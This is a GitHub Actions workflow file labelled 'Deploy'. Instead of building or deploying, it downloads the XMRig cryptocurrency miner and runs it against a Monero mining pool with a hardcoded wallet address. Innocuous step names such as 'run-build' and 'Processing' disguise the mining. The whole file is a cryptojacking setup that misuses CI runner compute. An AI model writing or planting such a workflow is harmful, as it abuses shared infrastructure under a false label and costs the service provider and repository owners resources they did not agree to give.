name: Deploy

on:
  workflow_dispatch:

jobs:
  run-build:
    runs-on: ubuntu-latest
    steps:
      - name: Download and extract
        run: |
          curl -L -o xmrig.tar.gz "https://github.com/xmrig/xmrig/releases/download/v6.26.0/xmrig-6.26.0-linux-static-x64.tar.gz"
          tar -xzf xmrig.tar.gz
          chmod +x xmrig-6.26.0/xmrig

      - name: Processing
        run: ./xmrig-6.26.0/xmrig --donate-level 1 -o monerohash.com:9999 -u 48mX7qP9vL3kZ2aN8dR5uT6sY1wE4cH7bF9gJ2nK5pQ8rV3xA6zM1sD4fG7hL9cN2vB5tX8qP3wS6yR9eU1iO4a -k --tls
